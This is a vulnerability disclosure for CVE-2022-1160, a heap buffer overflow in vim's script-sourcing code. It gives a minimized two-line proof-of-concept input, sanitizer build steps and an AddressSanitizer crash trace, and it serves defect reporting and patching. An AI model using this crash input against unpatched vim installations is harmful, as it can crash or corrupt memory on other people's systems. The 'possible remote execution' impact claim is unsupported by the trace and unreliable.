Headline
CVE-2022-1160: heap buffer overflow in get_one_sourceline in vim
heap buffer overflow in get_one_sourceline in GitHub repository vim/vim prior to 8.2.4647.
Description
When fuzzing vim commit 471b3aed3 I discovered a heap buffer overflow. I’m using ubuntu 20.04 with clang 13
Proof of Concept
Here is the minimized poc
norm300gr0
so
How to build
LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
make -j$(nproc)
Proof of Concept
Run crafted file with this command
./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!
ASan stack trace:
aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_get_one_sourceline -c :qa!
=================================================================
==2393051==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000004c6c at pc 0x000000430f36 bp 0x7fffffff7e50 sp 0x7fffffff7610
READ of size 1 at 0x612000004c6c thread T0
#0 0x430f35 in strlen (/home/aldo/vimtes/src/vim+0x430f35)
#1 0xafb4c6 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1930:25
#2 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
#3 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
#4 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
#5 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
#6 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
#7 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
#8 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
#9 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
#10 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
#11 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
#12 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
#13 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
#14 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
#15 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
#16 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
#17 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
#18 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
#19 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)
0x612000004c6c is located 0 bytes to the right of 300-byte region [0x612000004b40,0x612000004c6c)
allocated by thread T0 here:
#0 0x499fa9 in realloc (/home/aldo/vimtes/src/vim+0x499fa9)
#1 0x4cbea5 in ga_grow_inner /home/aldo/vimtes/src/alloc.c:741:10
#2 0x4cbc33 in ga_grow /home/aldo/vimtes/src/alloc.c:720:9
#3 0x4cc637 in ga_concat /home/aldo/vimtes/src/alloc.c:834:9
#4 0xafb1a0 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1919:6
#5 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
#6 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
#7 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
#8 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
#9 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
#10 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
#11 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
#12 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
#13 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
#14 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
#15 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
#16 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
#17 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
#18 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
#19 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
#20 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
#21 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vimtes/src/vim+0x430f35) in strlen
Shadow bytes around the buggy address:
0x0c247fff8930: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff8940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fff8950: 00 00 00 00 00 00 00 00 00 00 00 00 00 05 fa fa
0x0c247fff8960: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff8970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c247fff8980: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa
0x0c247fff8990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff89a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff89b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff89c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff89d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2393051==ABORTING
💥 Impact
This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution
Related news
Gentoo Linux Security Advisory 202305-16
Gentoo Linux Security Advisory 202305-16 - Multiple vulnerabilities have been found in Vim, the worst of which could result in denial of service. Versions less than 9.0.1157 are affected.
Gentoo Linux Security Advisory 202208-32
Gentoo Linux Security Advisory 202208-32 - Multiple vulnerabilities have been discovered in Vim, the worst of which could result in denial of service. Versions less than 9.0.0060 are affected.